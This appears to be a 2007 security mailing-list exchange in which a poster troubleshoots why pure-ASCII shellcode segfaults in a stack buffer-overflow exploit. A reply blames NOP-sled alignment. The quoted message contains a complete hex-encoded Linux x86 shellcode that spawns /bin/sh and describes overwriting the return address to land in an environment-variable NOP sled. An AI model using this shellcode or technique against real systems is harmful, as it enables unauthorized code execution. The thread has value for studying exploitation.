what I meant with the word alignment is that you might have something like:
\x90\xeb\x1f\x5e instead of \xeb\x1f\x5e\x89 -- this will segfault
and is due to the number of nops
can you run this though gdb (or some other disassembler) and show me
the hex shellcode in memory?
On 22 Apr 2007 10:42:24 -0000, nonexistant_at_nospam.org
<nonexistant_at_nospam.org> wrote:
> Yes I'm having a seg-fault, but I can't catch you...
> AFAIK when EIP is pointing somewhere in the NOP sled, no matter how the shellcode is aligned... Alignment has nothing to do here...?¿? I'm wrong?
> More over, I've tryed more than 5 different ASCII shellcodes all with the same result... Always segfaulting. It looks as if shellcodes where not working for any common reason...
> So, summarizing:
> 1.- I can perfectly overwrite RET thus having EIP pointing almost 100% of the time to the NOP's of my shellcode (in an environment variable)
> 2.- My -non-ascii- shellcode works perfectly
> 3.- Whn I try with ANY pure ascii shellcode, it fails 100% of the time.
>
> What is happening?
>
> I've tryed with pure ASCII shellcodes ripped from http://shellcode.org/Shellcode/linux/ascii/ among others...
>
> Metasploit framework failed to convert the original shellcode -the one that works- to pure ascii with the selected charset (A-Z,a-z,0-9).
>
> That's the original shellcode:
>
> \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh
>
> Is anyone able to convert this to pure ASCII or giving me a working pure ASCII shellcode or helping me understand why all the pure ascii shellcodes are failing in my exploit?
>
> Thank you,
>
--
Deian Stefan
GPG fingerprint: BED8 F536 3CDB AC28 CCBB 2ECE 66C3 5810 9025 23CF
Received on Apr 22 2007
Intro
